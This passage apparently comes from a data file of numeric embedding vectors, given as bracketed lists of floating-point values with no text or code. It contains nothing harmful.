.062219262,-0.04048845,-0.019391766,0.025423473,-0.054408893,-0.019414458,0.0087847095,-0.0013251139,-0.011622973,-0.06333382,-0.04370744,-0.007848314,-0.010035697,0.03322924,-0.05251164,0.013945291,0.06758727,-0.016982151,0.00853968,0.012609934,-0.007374821,-0.009513268,-0.009371829,-0.035772737,0.019822674,-0.0101355845,-0.05581176,0.083088145,-0.036273353,0.0009303396,-0.025359327,-0.012692587,-0.051260397,0.054697677,-0.05465432,0.03408663,-0.04019964,-0.009952013,-0.050620936,0.034399915,0.012360123,-0.05847816,-0.007320816,-0.008639461,-0.009644914,-0.06817074,0.021579558,0.040723756,0.008177238,-0.023180572,0.053139027,0.020107241,-0.022065004,-0.01583575,0.00531539,0.054493256,-0.010986233,0.047674656,0.09523305,0.014144047,-0.008991651,0.040867448,0.06523677,0.044120185,-0.028574375,-0.0016200423,-0.036497384,0.044771887,-0.03258816,0.014882802,-0.015119321,-0.002907992,-0.06323487,-0.0033114227,0.03342813,-0.0070228972,-0.039727844,-0.026543157,0.010850944,-0.016819283,0.0027769194,0.06478988,0.03713999,-0.0057554008,-0.04935988,0.04002504,0.04008963,-0.013686128,0.0030179902,-0.037047908,-0.018144418,-0.052303407,-0.015610008,0.06437095,-0.033980902,-0.01966919,-0.025905674,-0.03558548,-0.050412085,-0.012312806,-0.028060926,-0.029004475,-0.03469,-0.029327763,-0.009708914,0.025736965,0.009121159,-0.0024279316,-0.038021203,-0.017316142,0.063155115,-0.035110544,0.011980776,-0.0031065647,0.02901194,0.020435527,0.0114683965,0.034301437,-0.00019519252,-0.034903545,-0.046175174,-0.023259725,-0.044239234,-0.06884595,0.07108167,0.005849785,0.0034747818,0.0046069887,-0.015876997,-0.02487779,0.05678677,0.07448581,0.01202033,-0.050005272,-0.0054357485,0.021694826,0.0043367236,0.035568584,-0.06874358,-0.002532023,-0.025397465,0.006420473,-0.03750981,-0.058084425,0.032548416,0.027173985,0.0059185824,0.012208981,0.0146302,-0.0752756,0.000018729244,-0.025755752,0.022950508,0.015627345,0.025663847,0.010811739,-0.0024835414,0.0040404582,0.04346464,-0.04085405,-0.043028146,0.016334625,0.036684904,-0.03194781,0.019516058,-0.033220496,0.051673014,-0.01058323,-0.003219536,0.09917197,0.02265413,0.04847199,-0.022221532,0.07880562,-0.017773125,-0.04787274,-0.021491474,-0.008928815,-0.03137226],[-0.019990226,0.10761988,-0.1936985,-0.07925065,0.039933026,-0.03296323,-0.003698764,0.050474152,0.025709894,0.0035641175,0.0078001455,0.039615843,0.09361034,0.005854784,0.015989373,-0.04350691,-0.029871773,-0.023357527,-0.003803347,0.06562598,-0.022251017,0.0109922085,-0.017333142,-0.053075127,0.055575717,0.062889725,0.03422841,-0.0027775697,-0.052657828,-0.037042283,0.03892433,-0.06490726,0.0070057334,0.04920033,-0.05466774,-0.043748643,0.05996194,0.051429354,-0.029901966,0.0029205077,0.058455203,0.044766538,-0.01582472,-0.02963406,0.055289324,0.011162513,0.0072787176,-0.019483944,0.063304774,-0.053236824,0.053833194,-0.022115333,0.037575226,0.03635024,0.04888951,0.036418337,-0.0065416805,0.005823582,0.0018591668,-0.04042904,0.073828086,0.03695949,-0.086754255,0.038090173,0.034809966,0.0025379206,-0.004397043,0.056828637,0.03752941,-0.06447519,0.027386168,0.02701215,-0.027846841,0.016353983,-0.06008576,-0.030899907,-0.036502857,0.006037243,0.0046755043,0.054421596,0.011768132,-0.028394528,0.09187098,0.024859369,0.03193527,0.02620305,-0.012554888,-0.03937614,-0.01954969,0.08301252,0.015546852,0.009277466,0.0146103315,0.033022966,-0.029313311,0.046850614,0.026799964,0.020338528,-0.021369562,0.016101765,-0.049048994,-0.0106783,0.08544651,-0.005856081,0.021043086,0.009584892,0.0011369461,-0.0101426495,-0.04766898,0.00039665683,-0.041846618,0.017987888,-0.031107206,-0.000013621385,-0.024676228,-0.01001232,0.009625546,0.015195697,-0.043385893,0.061906543,-0.02378824,-0.014465007,0.0049010413,0.05937725,-0.016050203,0.035937443,-0.06463359,-0.003824247,0.018564679,-0.040612016,0.00037020148,0.0045409584,-0.025981596,-0.031901333,0.012070959,0.07529254,-0.034970127,0.0029783284,0.024445057,-0.014722064,0.028015554,0.009779017,-0.016860936,-0.043073494,-0.060875542,-0.062000517,0.020241247,-0.039639436,-0.050130557,0.016601197,0.0058073374,0.03369288,-0.01121458,0.026355386,0.038296256,-0.032803558,0.028188894,-0.014642968,-0.017051462,0.0066042244,0.010474889,0.03343382,-0.038657695,0.034718584,0.00870161,-0.051335458,0.019316074,0.034334216,-0.003946498,0.07501377,-0.075056784,-0.016580384,-0.03380302,0.010105357,0.036562655,-0.038665134,0.031035963,-0.052106626,0.006471278,-0.021023355,0.0048351046,-0.08608144,0.0146787455,0.037103318,-0.044662632,0.0049842293,-0.0008304204,-0.04621912,-0.0016747307,-0.01024686,0.01637211,-0.0172851,-0.03469421,-0.003203943,-0.054161467,-0.04247075,0.03439835,0.018846376,-0.03620697,-0.037135232,-0.05794339,0.014195639,-0.04759453,-0.025765495,-0.030044943,0.06453272,0.03357443,0.042205088,-0.02977454,0.033037167,0.06221737,-0.03552593,0.02927384,-0.018651448,0.033876777,-0.024951845,-0.035192553,-0.009930531,-0.005004867,-0.0038759643,-0.010674862,0.033773698,-0.005078133,-0.02188088,0.011911382,-0.018605731,-0.018373305,-0.0012237736,0.022895696,0.005043857,-0.015193564,-0.11161478,0.059073072,-0.013810949,0.011369016,0.0245988,0.021286283,0.05404096,-0.002412427,0.009834096,0.012867206,0.024969356,-0.0022670585,-0.023254128,-0.05200242,0.0057731676,0.017247904,-0.00095385127,-0.0146787455,0.05211257,-0.02041278,0.012072871,0.04610581,-0.0005186078,0.04289232,-0.029306183,-0.024439326,-0.003064954,-0.0107753035,0.0413662,0.031515833,-0.03199009,0.03956349,-0.05623322,-0.02623152,-0.036639612,-0.04092728,0.0052011455,0.014365907,0.01908404,0.045205437,0.029782938,-0.002542142,0.05944785,0.0100203445,-0.009111586,-0.022563541,-0.026104202,-0.023440938,0.012068135,-0.042047054,-0.037529834,0.0040682186,0.004102956,-0.0050945613,0.022829313,0.021113584,0.041451268,0.021580355,-0.0051543214,-0.011751413,0.018939778,-0.018772846,0.02275496,-0.005990623,0.0013249657,0.0030708509,0.027474256,0.018003767,-0.046132185,0.046401985,0.01321361,0.06212764,0.07432004,-0.044336528,-0.015841298,0.019989917,-0.037520677,0.07149108,-0.047596596,-0.029502695,0.034799185,-0.03158805,-0.0018824965,-0.052256476,0.04510593,0.06037544,0.026315697,0.034750406,0.01896876,0.018119693,-0.049158037,0.01526902,-0.08637632,-0.02839138,0.053330436,-0.042515155,0.00019405388,-0.011648604,0.0030992401,0.022839641,0.023648588,0.02449781,-0.023965904,-0.048328206,0.063589826,-0.012413494,0.010654637,0.030113531,0.049237054,0.1001769,0.0066293143,0.010246757,-0.030845951,-0.0060864394,-0.003915358,-0.04138566,-0.0136612505,0.033012312,-0.006609734,-0.0322044,-0.006956574,-0.011003609,-0.026408035,0.03746317,0.0066029932,0.03891534,0.039595563,0.026456472,-0.0070557725,0.05225556,0.015275246,0.0072357324,-0.0028287508,-0.010281903,0.0545545,0.05357744,-0.008341178,0.017836869,0.043733153,-0.01426684,0.003938562,-0.02545286,-0.011189283,-0.01090141,0.04441532,-0.09451777,-0.0014732631,-0.015429637,-0.01704344,0.019418025,-0.026301919,-0.026330486,0.026637942,0.026375806,-0.029943896,-0.005848225,-0.03936953,0.034166254,0.010578839,-0.0019831893,0.011969549,-0.06300364,0.0045002555,0.00762062,-0.04584499,0.042742904,-0.032145023,0.018131243,0.040724877,-0.019186208,-0.061789274,-0.0055320663,0.0072461516,0.016360173,0.040325046,-0.0055764224,-0.04191747,0.026232295,-0.007643261,-0.00034980918,-0.011921949,-0.016466493,-0.053020168,0.011372434,0.037594806,0.046688598,-0.04071702,-0.009275768,0.0036772878,0.043632142,0.03681769,0.011994786,-0.010981362,0.013094133,0.02329165,0.017209923,0.018667301,-0.017290303,-0.019006494,0.04278672,0.04383758,0.055708595,-0.0006611557,0.009512771,0.012462132,-0.03499572,0.020205544,0.0009216337,0.02148953,0.046781916,-0.06258533,-0.06651876,-0.054882128,0.028560704,0.04147721,0.01525541,-0.026331395,-0.09101192,0.0006744911,0.012479797,0.007308374,0.008244533,0.013182498,0.12199288,-0.037269577,-0.021686241,-0.015140633,0.047586568,0.004784917,0.0084571745,0.028256498,-0.07298207,0.027637362,0.035932522,-0.030558646,-0.024689194,-0.016338376,0.029260598,0.05321538,-0.03418797,0.011812209,-0.0061835125,-0.084623136,-0.0041754902,0.02413975,-0.022361085,-0.006645082,0.028264668,0.047960494,-0.018876147,-0.037656106,-0.057043087,-0.049579065,0.007673322,0.028653823,0.008935092,-0.02858328,0.007027688,-0.019625785,0.038212154,-0.017281076,0.013205529,-0.032006893,-0.019518308,-0.007522755,0.00094479497,0.04690802,0.03058624,0.000052216765,0.065403834,0.047185443,-0.043143224,-0.00475087,0.017260103,-0.024726547,0.08822227,-0.0055221682,-0.08857967,0.00013491955,0.012212571,-0.006991895,0.015192128,-0.008495802,0.04026561,-0.042304393,0.020537518,-0.0014759979,-0.03807998,-0.004817085,-0.002298277,-0.04245596,-0.0040758434,-0.028883975,-0.0584496,0.021994902,0.03602947,-0.07888606,0.04259825,-0.0017340881,0.031191988,0.0133251585,-0.03486749,0.00035396422,0.02268137,0.0027073252,-0.041623358,-0.013626567,0.03874169,0.0355874,-0.012161929,0.032321215,0.042232953,0.0027943978,0.04360885,0.009710793,-0.014712745,0.049014375,0.009614433,-0.04419091,0.033989184,-0.08604651,-0.0058113006,-0.044340692,0.00046650073,-0.01974184,-0.0031183627,0.00416124,-0.022015346,-0.04444937,-0.0054155723,0.046727296,0.010598313,0.010544021,-0.027470538,-0.029782008,0.013898429,0.0071115517,0.016617851,-0.002075924,0.01836182,-0.040870324,-0.0014765467,-0.02256143,-0.004238582,-0.0047874223,-0.013607553,-0.009774428,-0.05445862,-0.05594586,-0.01917568,-0.026767379,0.017557207,0.003736596,-0.029127471,-0.042044662,-0.05272079,-0.04375625,-0.0700118,0.0036372575,-0.01826441,0.005331039,0.017499438,-0.046374,-0.010751083,-0.00026288125,0.014030283,0.0034832987,-0.07923047,-0.05857029,-0.0069515384,0.008683279,0.08800317,-0.056002114,0.03809341,0.043054055,-0.026995894,0.03099914,0.015332529,0.0025181803,0.03893157,0.009557475,-0.019712409,0.0056685028,0.02131984,-0.017454775,0.0454524,-0.016855983,-0.026210489,-0.030145273,-0.031496856,-0.051891774,0.039627496,-0.048254568,0.036013193,-0.008338243,-0.07091916,-0.020453755,-0.00073496613,0.04032168,-0.03771056,0.007418575,-0.026854305,-0.008946608,-0.07850142,0.014177113,-0.052010965,-0.014203342,-0.00879701,0.042257644,0.034937635,-0.015830705,0.00964338,0.015149523,0.06698511,0.008776515,0.0017489234,0.04066396,0.038595606,-0.02281765,0.09523008,0.06680856,0.028209051,-0.0019477293,-0.043352213,-0.039609637,0.04889936,-0.0367806,-0.046346344,-0.0387857,0.0075366613,0.00031267817,-0.03801284,-0.006360959,-0.0074685356,0.013414438,0.0027067307,-0.056998037,-0.022725487,0.011557392,0.038313054,0.04359024,-0.008939943,-0.06222403,-0.008389572,0.020823905,0.03654157,0.021474509,0.028580291,-0.02254933,-0.017610334,0.03335275,0.013166229,-0.076304905,-0.0019427063,-0.055017747,0.040895443,-0.035399284,0.019633401,0.013341835,0.0054829177,-0.052890573,-0.01811482,0.024970273,0.018658318,0.031008374,-0.015079613,0.021960273,-0.060196064,0.041549437,-0.022908961,0.04696004,0.0073779454,0.04813652,0.0075606364,-0.021323737,0.05299915,-0.009292017,0.01669863,-0.04461304,-0.023756396,0.038069736,-0.0065442,0.028951608,0.06400278,0.044912923,-0.0022386103,-0.00425189,-0.010308049,0.03557483,0.051145773,-0.034333587,-0.03414751,-0.07943246,-0.02793028,-0.0055153198,0.030725889,-0.092138365,0.0024374356,0.010333612,0.0016429318,-0.040181812,-0.045488574,0.044998605,0.017183656,0.028873164,-0.019798579,-0.0071402807,-0.05196456,0.0038586673,-0.038569726,0.0027567227,0.0014215674,0.053182047,-0.038213216,-0.026410451,-0.006547567,0.0473412,0.040201593,-0.021824403,-0.0026799545,-0.0057317014,-0.014051106,0.0035590942,0.0038099017,0.018747792,0.03247132,0.016580436,0.08255212,0.04265371,0.014724998,-0.013939584,0.05102872,-0.029725717,-0.042425927,-0.024499029,0.0055576717,-0.047035765],[0.015473942,0.01741244,-0.16822281,-0.035019718,0.101604305,0.00473349,0.029414875,0.028233226,-0.017652728,-0.010777526,-0.013115561,0.027424695,0.05367301,0.033587936,0.012716208,-0.0023864356,0.03295022,-0.015542299,-0.0238599,0.06919106,0.0007764052,0.00060388213,-0.037817843,-0.028854776,0.071531035,0.07280803,-0.025256896,0.02293724,-0.059705585,0.02534607,0.03225469,-0.06052935,-0.026508493,-0.031474777,-0.07305742,-0.026792165,0.027816297,0.023943076,0.005965211,0.037434306,0.06632528,0.027980229,-0.01822378,-0.021750337,0.01861402,-0.0062356703,0.04430432,0.0046109837,0.064510465,-0.068883315,-0.020376042,0.0005250884,0.028041037,0.015671702,0.04957153,0.049273998,-0.06480146,0.022381475,0.022517258,-0.06104044,0.09250463,0.043019116,-0.08389682,0.0349527,-0.041700497,-0.02687243,-0.03767711,0.040066976,0.019268945,-0.04182235,0.04821128,0.034128703,0.014510401,0.08622717,-0.07223614,-0.054581214,-0.01887945,-0.029786754,0.007041,0.04914484,0.011455259,-0.004648583,0.03787975,0.012021122,0.038575374,-0.04435318,-0.01531836,0.033273477,-0.0698201,0.060951006,0.022573512,-0.018099897,0.028488584,0.008457373,-0.05165093,0.020066224,-0.0053071566,0.036245726,-0.021036198,-0.005121898,-0.041854054,-0.02135814,-0.016916992,0.027986696,0.028726552,0.039336585,0.037067268,-0.025846476,-0.064969815,-0.01951784,-0.030035065,0.04695888,-0.008971971,-0.027528616,-0.030059151,-0.030170167,0.026656361,-0.032535963,0.010515534,0.02082386,-0.019254798,-0.031782057,-0.073580414,0.04291804,-0.013118162,-0.0047702286,-0.028042398,0.014765808,-0.0018736996,-0.016425222,-0.0342222,-0.012791512,-0.011964366,0.0024922425,0.012913879,0.06730984,-0.0090517625,-0.00618564,0.03419493,0.014238822,0.03140596,0.045015547,0.010387902,-0.06737473,0.057699658,-0.070195094,-0.011934235,0.002222629,-0.03844635,0.046846423,0.045159962,-0.019489381,-0.0010069185,0.03584151,0.008066392,0.002420528,-0.019149296,-0.0141891055,0.040620044,0.0034162921,0.035187844,-0.02621327,-0.08685198,0.09147453,0.012278324,-0.061302327,-0.026366962,0.02258115,-0.009063099,0.037142906,-0.08077148,-0.01573235,0.004986103,-0.043202348,0.0023299023,0.02853125,0.008307298,-0.057214625,0.06490977,0.03273038,-0.001561298,-0.04336546,0.04833964,0.020729778,0.0073774927,-0.036456622,-0.008936078,-0.04081143,0.025847157,-0.023227878,0.0021453586,0.037406,-0.07258019,-0.031043053,-0.023725169,-0.045960486,0.000096221615,-0.031942572,0.013166247,-0.047492508,-0.078991495,-0.03473717,-0.028934563,-0.047283165,-0.061113495,0.03635142,0.01662481,0.02541453,-0.051045835,-0.002550478,0.07673123,-0.013134982,0.022423742,0.003208458,-0.003542533,-0.0130871525,-0.003145113,-0.029418347,0.007966902,0.003110057,0.031530518,-0.024939168,-0.013663068,0.014889039,0.034847744,0.016561719,-0.028417664,-0.045184016,-0.056922402,-0.028968781,0.000007695157,-0.08216679,0.03548018,-0.033250924,-0.0018382701,0.02983676,-0.0022585231,0.019517878,0.015711943,0.02967866,-0.007623795,0.04718141,-0.015138291,0.029789144,-0.04632295,0.010281891,-0.0043657077,-0.015189002,-0.0043905224,0.066236116,0.0032274406,0.050408263,0.02877138,0.04478032,0.047768857,-0.030926926,-0.01597173,0.0035468354,0.062414173,0.009993581,0.031314142,-0.003861566,-0.0127021335,-0.07295531,-0.027104191,-0.028760087,-0.02838255,-0.005736888,-0.0059768697,0.015148476,0.013342934,0.033988494,0.0030609544,0.024496373,-0.0024414796,0.022204705,-0.011454749,-0.021608995,-0.0069964905,0.02118057,-0.04133441,-0.01356386,-0.0103481375,0.0043437732,0.01322784,0.021047855,0.003568055,-0.0020776931,-0.007588442,0.00068931514,-0.003924005,-0.021444349,0.016071549,0.01187527,-0.0024035033,0.039077766,0.0153138,-0.011990916,0.035503075,-0.048564877,0.055816602,0.04443393,0.046676334,-0.012242143,0.007160134,-0.037931982,0.018663017,-0.019651903,0.06476917,-0.04428206,-0.03730588,0.04059563,-0.047355775,0.07259633,-0.023523556,0.037398934,0.030369392,0.019735608,-0.006051464,-0.01506089,0.003755484,-0.047639754,0.02633928,-0.023503147,-0.004779824,0.039315756,-0.024654975,0.026588917,-0.016950812,-0.029376546,0.039846465,-0.0033113188,0.012867909,-0.020703346,-0.05583924,0.012440424,0.010913989,0.0206142,-0.00019649878,0.007917696,0.0164373,0.029991785,0.0017316685,-0.03361157,-0.00056758075,-0.0048381523,-0.067660406,-0.038631488,0.018766979,0.05824839,-0.013987685,-0.021807408,-0.0067719845,-0.04144765,0.023671934,-0.014477588,0.04027218,0.028180119,0.0045100586,-0.013231239,0.04649371,0.023222644,-0.0034028157,0.0057743355,-0.022331806,0.015634641,0.025475964,-0.008915396,0.046408527,-0.013027411,-0.030380256,-0.02035764,-0.040581744,-0.028501747,-0.022716325,-0.0047162087,-0.059813946,0.004027412,-0.0044042263,0.042009793,0.011405002,-0.008225564,0.04135418,0.019583793,0.024452424,-0.054320585,0.059522077,-0.0005217693,0.0020784352,0.041283753,-0.034274857,-0.010787481,-0.011377731,0.03178956,0.028048836,-0.061649214,0.028917786,0.050805528,0.011392517,0.06795837,-0.059064347,-0.061752338,0.027835555,-0.00043813838,-0.017372334,-0.031065423,-0.037940048,-0.04712728,-0.021689195,0.05750623,-0.0061265295,0.022734959,-0.036249235,-0.055722296,-0.011816062,0.016297251,0.029701602,-0.010617155,-0.009207375,-0.07618306,0.07306705,0.015910463,0.0045362543,0.0023975323,-0.0031608243,0.046566527,-0.0013888031,0.054416116,0.043182638,-0.044622634,0.073803395,0.008202846,0.0004939533,-0.00390897,-0.00072782685,-0.025666595,0.06646373,0.011617508,0.00012970968,0.019106233,0.0074093575,-0.02907047,-0.10216253,-0.03505982,0.029367764,0.061410807,0.09760233,-0.021475513,-0.028168214,0.070262365,0.023032894,-0.03536313,0.056759264,0.028483093,0.13307227,0.006292329,0.04668398,0.019422736,-0.013465565,0.020260239,0.06394132,0.010106961,-0.03483666,0.04805805,-0.012813078,-0.01729319,-0.008591002,-0.045058366,0.01407287,0.0020446517,-0.08412629,0.019256867,0.0155804055,-0.06943801,-0.021381851,0.038294587,-0.022727733,0.015750645,-0.010887056,0.03826254,-0.005174959,-0.05267649,-0.006166546,0.0073825144,-0.033606235,0.03824203,0.0057435688,-0.006894896,0.032732423,-0.017065037,0.043802667,0.009189927,0.031752814,-0.048629265,-0.029755272,-0.0066749305,-0.024435053,0.03364584,0.055639233,-0.0017021535,0.011628322,0.058232237,-0.005561041,0.016478505,-0.02151854,-0.013211633,0.08049553,-0.05190446,-0.043090127,0.0067325206,0.006151889,-0.024875185,0.02852354,0.035235018,0.056004692,-0.053792324,0.020875357,0.024068248,-0.07976224,0.017470596,0.0329152,-0.043856263,-0.009788581,-0.01663815,-0.026469959,-0.009473924,0.036979333,-0.081272654,0.0034847541,0.014283534,0.052855555,0.029877897,-0.03886489,0.00037967606,0.014221008,0.019256474,-0.033266123,-0.007899382,0.024744641,0.010033862,0.0042141615,0.014993045,-0.012764496,-0.065513566,0.016046913,0.005738228,-0.032559566,0.024946893,0.0048390105,-0.0865511,-0.00021309593,-0.008318458,0.038410835,-0.030578466,-0.006786352,-0.039106,-0.008420868,-0.041084222,-0.0325141,-0.082703486,-0.010405399,0.008922867,0.062377237,0.020144537,0.024150146,-0.025446007,-0.02726971,-0.0074955733,-0.02240277,0.0078817615,0.013218995,-0.03589193,0.025999699,0.009336141,-0.005032812,-0.0037789424,0.012382842,-0.03673072,-0.03364119,-0.046975527,0.0044336584,-0.058224503,0.03315461,0.04357144,-0.016500063,-0.016278377,-0.07666997,0.014056653,-0.026008679,-0.028720617,-0.01824575,-0.007260473,0.05972775,0.008281115,-0.021185622,-0.009671736,-0.043641742,-0.027908381,-0.07096093,-0.069750346,0.022270933,0.017057605,0.06680572,-0.04258349,0.02363349,0.049049973,-0.05319708,0.06960434,-0.00943134,-0.01908725,0.014307049,0.05636193,-0.0045705005,-0.010087899,0.0064203977,-0.05746623,0.04434706,-0.037972808,-0.04229378,-0.04147823,0.028698092,-0.048200577,0.023447778,-0.06380537,0.013798829,-0.018192708,-0.024668464,-0.03887161,0.012182212,0.012113598,-0.04515687,0.040254556,-0.04235772,-0.006566419,-0.030413378,0.020844774,-0.020053033,0.043080878,0.0335132,0.04769452,0.017747525,-0.022409305,-0.0058170534,-0.0008254093,0.0719594,0.0018895888,-0.016321324,0.05476506,0.004813499,-0.04112323,0.060536023,0.061132718,0.055219274,-0.017434394,-0.007768602,-0.015490335,0.004861198,0.0053355154,-0.032696094,-0.03534592,-0.0057958066,-0.00008297173,0.01636104,0.006918455,0.036016773,-0.016524019,-0.025439486,-0.024660993,-0.06951265,-0.019849567,0.02507352,0.017461067,-0.0015224916,-0.047143556,0.026935913,0.017621154,-0.003211266,0.01658357,0.0004667974,0.00025871053,0.039151978,0.004592195,-0.009850711,-0.00488352,0.023499943,-0.027714245,0.016915668,-0.034944758,-0.0115798,0.013273502,-0.028345058,-0.00059216743,-0.043419953,0.002206996,-0.006783933,-0.0019556368,0.029058315,0.0039056223,0.033638563,0.071244545,-0.010986055,0.04352089,0.007260241,0.052737553,0.012034084,-0.0020306173,-0.006226644,-0.041976474,0.0028968777,-0.047796287,-0.0021327208,0.007934066,-0.030043332,0.08226171,0.059537053,0.026948638,-0.02136724,-0.046091102,-0.0155353835,0.06743626,0.008331103,-0.02052404,-0.03089773,0.009331406,0.009094575,-0.022718593,0.021761384,-0.044505145,0.017858999,-0.0016005278,-0.023073623,-0.015487349,-0.045166474,0.062867984,0.00879785,0.022066774,0.004299376,-0.018093964,-0.07858939,-0.018125579,-0.028816137,0.064350024,0.027097343,0.013679309,-0.0024116104,-0.039609674,0.014466453,0.077440515,-0.011625811,-0.0322067,-0.0029036056,-0.019216679,-0.014008878,0.02371235,-0.07047057,0.0145186065,0.021197295,0.055512514,0.091389686,0.039988104,0.009758227,-0.014909021,0.058575828,-0.003749073,-0.00451648,0.0022016654,0.0045927446,-0.058162235],[0.0062737623,0.057236433,-0.1540723,-0.09504917,0.050799455,-0.045900267,0.0021834627,0.035535946,-0.016893461,0.019472232,-0.04054091,0.026875569,0.08674798,0.032622058,0.027011009,-0.06520846,-0.045011546,-0.033236966,0.0011662728,0.0522454,-0.051503696,0.029817576,0.033488844,-0.024451677,0.04566534,0.038836617,-0.016906995,-0.0214467,-0.040568516,-0.021226615,0.033864614,0.030402355,-0.008784649,-0.0007275368,-0.06766752,-0.003487575,-0.0072244187,0.030203793,0.005569342,0.002368324,0.05570042,0.019344524,-0.018002136,0.0043985094,-0.016532963,-0.04666671,0.0011967303,-0.01598733,0.04781262,-0.08538072,0.0252193,-0.0018071937,-0.04110362,-0.0034526682,0.105491824,0.0345182,0.024106113,-0.0036977618,-0.022261145,-0.069424644,0.0750673,0.048346605,-0.062483255,0.08288036,0.03131114,-0.022206364,-0.058920063,0.06404434,0.0014515847,-0.050595492,0.029037729,0.0047958787,-0.023904124,0.006952173,-0.030614102,-0.049829748,-0.007222119,-0.048118994,0.039825384,0.04149166,0.04610788,-0.022094402,0.06216653,0.02345116,0.026435077,-0.0042361906,-0.038455963,-0.045906473,-0.050060794,0.039856344,0.027953282,-0.008584094,-0.011883502,-0.004309516,-0.07418919,0.041978307,-0.0046741934,0.025806088,-0.028864324,-0.03296542,-0.055958293,-0.012503042,0.040208653,0.03799264,0.014545202,0.02032991,0.0047887354,-0.018467072,-0.021084365,-0.022155007,-0.03474882,0.063184604,-0.048709586,-0.034097865,-0.013615987,-0.0055462252,0.04384116,-0.026638798,0.0030036317,0.028843837,-0.014188334,-0.016223645,-0.023858601,0.053067863,-0.034069028,0.054998714,-0.020010091,0.02184326,0.020461537,-0.029051764,-0.010936843,-0.02052746,0.012537526,0.009127511,0.013470824,0.049546394,-0.023556583,-0.052816622,0.00789118,0.006170544,0.042712584,-0.0041572424,0.026387278,-0.0019770605,-0.0026468816,-0.05212547,0.002328902,-0.03776027,-0.043596458,0.04877188,0.019260384,0.024528526,-0.009604375,0.026799288,0.02059148,0.017768875,0.019951908,-0.013436939,-0.02347941,0.0061134044,0.055663247,-0.0018653324,-0.041520596,0.040590625,-0.03058999,-0.0405349,0.0041275313,-0.015101034,-0.02502051,0.015295896,-0.06427366,0.0020890909,-0.034311567,-0.03163374,0.013504745,0.0018460064,0.07842744,-0.05211271,0.025993345,0.0021062884,0.012846147,-0.05207013,0.016064804,-0.0007549568,-0.013381317,-0.004367646,-0.05228387,-0.047646444,-0.021327382,-0.035164226,0.0044280784,0.001557451,-0.03746338,-0.003382228,-0.049465686,-0.058449674,0.011562969,0.028420748,0.057119817,-0.03402988,-0.029479692,0.0035247393,-0.06278421,0.032612767,0.0016268612,0.08930002,-0.0030823373,0.026173217,-0.038131688,0.070913136,0.07415921,-0.01590483,0.010751578,-0.006332099,-0.020182071,-0.03510894,-0.0032146438,-0.016377246,-0.031563267,-0.015301933,0.01540592,-0.030747587,0.016382607,-0.003179712,0.025500627,0.0099284435,-0.05076981,0.00040035028,-0.007308011,0.00090386916,-0.021423139,-0.11455904,0.050180674,-0.019410416,0.041558,0.011460869,0.014244914,0.060052346,-0.03308388,0.0072281356,0.021085935,0.048596278,-0.026779879,0.0021703895,-0.0027007097,-0.00981312,0.024553493,-0.038120624,-0.05052206,0.04300698,-0.03035703,0.011298852,-0.019847564,0.00016403472,0.04672372,-0.026165657,-0.016562777,0.021224335,0.011620381,-0.008850164,0.03541968,-0.054729186,-0.019280909,-0.06530192,-0.07279741,-0.05539145,-0.023091296,0.000530407,0.028541043,-0.013060564,0.03541758,0.016070366,0.0020796512,-0.015094867,-0.021544717,0.0060331845,-0.010438443,-0.033090226,-0.0013580415,0.001315384,-0.02768861,-0.018838892,-0.0031342786,-0.0007308174,-0.00046281298,0.022146447,0.0433264,0.033788282,0.018580614,0.03749604,0.045185395,-0.018734766,-0.057417642,-0.00046188207,-0.0047246725,0.030209722,0.018326778,0.039814487,0.017712884,-0.08372639,-0.0211154,0.0034587646,0.029196175,0.047391165,-0.019505711,-0.024128085,-0.01937759,-0.051265962,0.051670007,-0.0052641192,-0.04459365,-0.0042843423,-0.014158499,0.01693015,-0.0114790965,-0.0019744898,0.02207503,0.03456619,0.03930561,-0.008653809,0.015781842,-0.025757873,0.039096173,-0.042973343,-0.0021531002,0.06467651,-0.016400917,0.03334579,-0.0529934,0.0050560767,-0.015046415,0.025563933,0.0009185775,-0.055893946,-0.0054271743,-0.004450169,0.055098042,-0.008224208,-0.013826813,0.02870341,0.09470244,0.024048349,0.007787279,-0.057675727,0.011575172,0.06924898,-0.0057227453,-0.00036947546,0.056983713,0.011632111,-0.014185943,0.068918616,-0.007922261,-0.047919106,-0.018454384,0.028655915,0.0852293,0.0008835852,-0.017900515,-0.045483913,0.07874444,-0.022477327,0.056441262,0.010555598,-0.036141336,-0.04047606,0.024731945,0.06702675,0.032708827,0.005566506,-0.007630368,-0.040765643,-0.050033484,0.036905743,-0.062005308,-0.0015612908,-0.03510418,0.00045853693,0.024741048,0.007842733,0.029375654,-0.009870637,0.030883677,0.012639667,0.017300285,0.015801523,0.010637284,-0.0051953928,0.015649753,0.010818957,0.018401595,0.027081238,-0.04365509,-0.01929758,0.0035034046,-0.024404673,-0.020974018,0.014343125,-0.004642723,0.038458195,-0.038536694,-0.052456122,0.0033304477,-0.009296359,-0.0031039289,-0.0006330836,0.012963834,-0.044288516,0.026149938,-0.012992039,0.010414116,0.07983949,-0.012856401,-0.097668745,0.0052142213,0.011382884,0.08717176,0.01203432,-0.045754272,-0.007201763,0.009846255,0.018667243,0.029319268,0.022675008,0.04508051,0.02514186,0.026997292,0.039795976,-0.015644103,-0.0071312464,0.014626303,0.02772343,0.036860134,-0.026098676,-0.02160462,0.0020286762,0.035031,0.009547047,0.041602097,0.014266139,0.046292998,-0.045954853,0.0042179497,-0.038567666,0.052127488,0.0062883706,0.032667186,-0.031392,-0.061224468,0.03393818,0.010224504,0.03601785,0.034353457,-0.009399809,0.10908861,-0.030453354,-0.021720476,-0.018762391,-0.0046946695,-0.0028845954,0.044569224,0.022249755,-0.06348937,0.018606145,0.041965652,-0.048664212,-0.011525305,-0.048835218,0.019284517,0.05017043,-0.06015012,0.056108166,-0.012283898,-0.046899486,0.050704513,0.030861005,-0.011395021,0.060571317,0.01558392,0.032369286,0.04365752,-0.048664175,-0.061761055,-0.05241974,-0.050138514,0.064799614,-0.006827012,-0.008921763,0.002004392,-0.0017924571,0.0017437839,0.0020356413,-0.02039808,-0.02998986,-0.011348923,-0.041226,-0.035984624,0.05430336,0.017095592,0.03569335,-0.0013637727,0.047396757,-0.00577294,-0.0035617012,0.03106869,0.03419985,0.062206298,-0.043690223,-0.06725874,0.028226772,-0.0035021645,-0.014829778,-0.00094286626,0.0042857034,0.06184478,-0.04386613,0.012283706,0.0087775,-0.05604951,0.0039021822,-0.018075055,-0.018099809,-0.011568509,0.0004926885,-0.052727155,0.036901847,0.047738943,-0.062407244,0.04454381,0.02460921,-0.0076529006,0.0095084105,-0.04845594,-0.016702216,0.001106231,-0.032871183,-0.05175477,0.013572953,0.014282088,0.014928722,0.028422454,0.036827352,-0.019545827,0.015306379,-0.003